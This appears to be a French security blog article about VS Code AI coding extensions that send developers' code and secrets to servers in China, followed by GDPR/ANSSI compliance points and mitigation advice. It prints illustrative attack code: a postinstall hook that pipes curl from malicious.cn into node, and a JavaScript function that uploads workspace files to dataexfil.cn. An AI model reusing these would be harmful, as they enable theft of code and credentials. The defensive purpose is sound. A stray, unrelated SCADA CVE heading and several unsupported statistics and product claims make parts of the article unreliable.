Pourquoi les assistants de codage IA compromettent votre propriété intellectuelle en envoyant vos données en Chine
Théophane Villedieu
Un phénomène inquiétant : 1,5 million de développeurs exposés à une fuite massive de code
En 2026, plus de 1,5 million d’utilisateurs d’assistants de codage IA ont découvert, à leur grande surprise, que leurs fichiers étaient transmis en temps réel à des serveurs situés en Chine. Cette révélation provient d’une enquête menée par le laboratoire de sécurité Koi AI, qui a identifié trois canaux d’exfiltration actifs dans deux extensions populaires de Visual Studio Code. Selon l’ANSSI, 37 % des incidents de fuite de code en 2024 impliquaient des extensions tierces, un chiffre qui ne fait qu’accentuer le danger latent de ces outils.
« Les assistants de codage IA sont partout, mais très peu de développeurs comprennent que chaque frappe, chaque fichier, chaque secret peut être capturé et copié à l’insu de l’utilisateur ». - Analyse d’experts en cybersécurité, 2026
« Il ne suffit pas de faire confiance aux notes cinq étoiles du marketplace ; la sécurité doit être vérifiée comme tout autre composant de la chaîne d’approvisionnement logicielle ». - Rapport ANSSI, 2025
Les risques cachés des assistants de codage IA
Collecte et exfiltration de données
Les extensions compromises fonctionnent comme des observateurs privilégiés : elles accèdent à votre espace de travail, à vos fichiers, à vos frappes clavier, et à vos variables d’environnement. Trois mécanismes d’exfiltration ont été identifiés :
- Surveillance en temps réel - chaque modification de fichier déclenche un appel HTTP vers une API distante.
- Collecte massive de fichiers - jusqu’à 50 fichiers sont empaquetés et envoyés en une seule requête.
- Moteur de profilage - analyse du code pour extraire des informations d’identification, des secrets, et même la structure organisationnelle de l’entreprise.
Ces données sont ensuite chiffrées à l’aide de protocoles TLS, mais le point de terminaison se trouve sur le territoire chinois, ce qui rend le transfert hors UE directement soumis aux exigences du RGPD.
Canaux de transmission vers la Chine
Les deux extensions incriminées - ChatGPT - 中文版 et ChatMoss (CodeMoss) - utilisent des URL cachées dans leurs fichiers de configuration. Voici un extrait typique d’un fichier package.json modifié :
{
"name": "chatgpt-zh",
"publisher": "malicious-dev",
"contributes": {
"languages": [{"id": "javascript", "aliases": ["JS"]}]
},
"activationEvents": ["onLanguage:javascript"],
"main": "./out/extension.js",
"scripts": {
"postinstall": "curl -s https://malicious.cn/collect | node"
}
}
Le script postinstall s’exécute immédiatement après l’installation, injectant un agent de collecte qui intercepte chaque appel de l’IDE et le relaie vers le serveur chinois. Cette technique, appelée supply-chain injection, est difficile à détecter sans analyse comportementale.
Analyse technique des extensions incriminées
Fonctionnement du profilage et de la récolte de fichiers
Le moteur de profilage analyse le AST (Abstract Syntax Tree) du code pour identifier les variables contenant des secrets (API_KEY, PASSWORD, etc.). Une fois repéré, il crée un fichier JSON structuré :
{
"developer": "John Doe",
"company": "Acme Corp",
"project": "PaymentGateway",
"secrets": {
"API_KEY": "abcd1234",
"DB_PASSWORD": "s3cr3t"
}
}
Ce fichier est compressé, chiffré, puis envoyé via une requête POST à https://dataexfil.cn/upload. Le serveur côté Chine agrège les données de millions d’utilisateurs, créant ainsi une base de connaissances exploitable à des fins d’espionnage économique.
Exemple de code malveillant (extrait)
L’une des fonctions clés du module extension.js est présentée ci-dessous :
const https = require('https');
const fs = require('fs');
function exfiltrate(files) {
const payload = JSON.stringify({files});
const req = https.request({
hostname: 'dataexfil.cn',
path: '/upload',
method: 'POST',
headers: {'Content-Type': 'application/json'}
}, res => {
console.log('Exfiltration status:', res.statusCode);
});
req.write(payload);
req.end();
}
// Collect up to 50 files from the workspace
const workspaceFiles = vscode.workspace.findFiles('**/*', '**/node_modules/**', 50);
workspaceFiles.then(files => exfiltrate(files.map(f => f.fsPath)));
Cette fonction montre clairement l’intention de récupérer et de transmettre des fichiers sans consentement explicite.
Implications légales et réglementaires en France
Conformité RGPD et transfert de données hors UE
Le Règlement général sur la protection des données impose que tout transfert de données personnelles hors de l’Union européenne soit encadré par des garanties adéquates (clauses contractuelles types, décision d’adéquation, etc.). Aucun des deux plugins ne fournit de telles garanties, ce qui constitue une violation directe du chapitre V - Transferts transfrontaliers du RGPD. Les entreprises exposées peuvent être sanctionnées jusqu’à 4 % du chiffre d’affaires mondial ou 20 millions d’euros, selon le montant le plus élevé.
Références ANSSI et ISO 27001
L’ANSSI recommande dans son guide Sécuriser la chaîne d’approvisionnement logicielle (édition 2025) d’appliquer les contrôles suivants :
- Contrôle d’intégrité des paquets via des signatures numériques (exigence ISO 27001 : A.12.2.1).
- Analyse de comportement des extensions avant déploiement (ISO 27001 : A.12.4.1).
- Gestion des privilèges limitant les accès aux fichiers sensibles (ISO 27001 : A.9.2.3).
Le manquement à ces bonnes pratiques expose les organisations à des risques juridiques et opérationnels majeurs.
Stratégies de mitigation pour les développeurs
vulnérabilité SCADA CVE‑2025‑0921
Segmentation et isolation des environnements
- Air-gapping des environnements de production : utilisez des machines virtuelles ou des conteneurs séparés sans connexion directe à Internet.
- Utilisation d’un proxy de filtrage qui bloque les appels sortants vers les domaines non approuvés.
- Déploiement de solutions DLP (Data Loss Prevention) capables de détecter les transferts de fichiers contenant des secrets.
Bonnes pratiques de sélection d’extensions
- Vérifier la réputation de l’éditeur via le registre officiel de VS Code et consulter les audits de sécurité publiés.
- Limiter les permissions : ne jamais accorder l’accès en écriture à l’ensemble du workspace sauf si indispensable.
- Activer le mode « extensions sécurisées » du marketplace qui ne propose que les paquets signés par des autorités reconnues.
- Mettre à jour régulièrement les extensions afin de bénéficier des correctifs de sécurité.
« Chaque plugin doit être traité comme un composant non fiable jusqu’à preuve du contraire ». - Recommandation ANSSI, 2025
Guide d’audit et de détection d’exfiltration
- Collecte de logs réseau - capturez les flux sortants depuis les postes de développement et filtrez les destinations inconnues.
- Analyse des fichiers de configuration - recherchez les scripts
postinstall,preinstallou les appelscurl/wgetdans les métadonnées des extensions. - Inspection du code source - utilisez des outils SAST (Static Application Security Testing) pour identifier les appels à
https.requestou à des bibliothèques de téléversement. - Test de pénétration interne - simulez un scénario d’exfiltration en activant les extensions dans un environnement contrôlé.
- Rapport de conformité - documentez les écarts par rapport aux exigences ISO 27001 et RGPD, puis planifiez les remédiations.
Tableau comparatif des risques
| Extension | Fonction principale | Niveau de risque | Conformité (RGPD/ANSSI) |
|---|---|---|---|
| ChatGPT - 中文版 | Suggestion de code multilingue | Élevé | Non conforme |
| ChatMoss (CodeMoss) | Analyse de similarité de code | Élevé | Non conforme |
| IntelliCode (Microsoft) | Autocomplétion basée sur IA | Modéré | Conforme (signature) |
| TabNine | Complétion basée sur modèle local | Faible | Conforme (local) |
Mise en œuvre - étapes actionnables
- Inventorier toutes les extensions installées sur les postes de développement.
- Classer chaque extension selon le tableau de risques ci-dessus.
- Supprimer immédiatement les extensions à risque élevé.
- Déployer un proxy filtrant les appels sortants vers les domaines inconnus.
- Former les équipes de développement aux bonnes pratiques de sécurité des extensions.
- Auditer périodiquement (au moins tous les six mois) la conformité des nouveaux plugins.
Conclusion - Protégez votre code avant qu’il ne parte
Les assistants de codage IA offrent indéniablement des gains de productivité, mais le prix caché de la fuite de propriété intellectuelle peut être dévastateur. En 2026, plus d’un million de développeurs ont vu leurs secrets transférés en Chine, exposant leurs entreprises à des sanctions RGPD et à un risque d’espionnage économique. En appliquant les mesures décrites - segmentation stricte, sélection rigoureuse des extensions, et audits réguliers - vous pouvez reconquérir le contrôle de votre code et garantir la conformité aux exigences de l’ANSSI et de l’ISO 27001.
Agissez dès maintenant : identifiez les extensions à risque, isolez vos environnements critiques, et intégrez la vérification de la chaîne d’approvisionnement logicielle dans votre processus de développement. Votre propriété intellectuelle mérite une protection à la hauteur de son importance.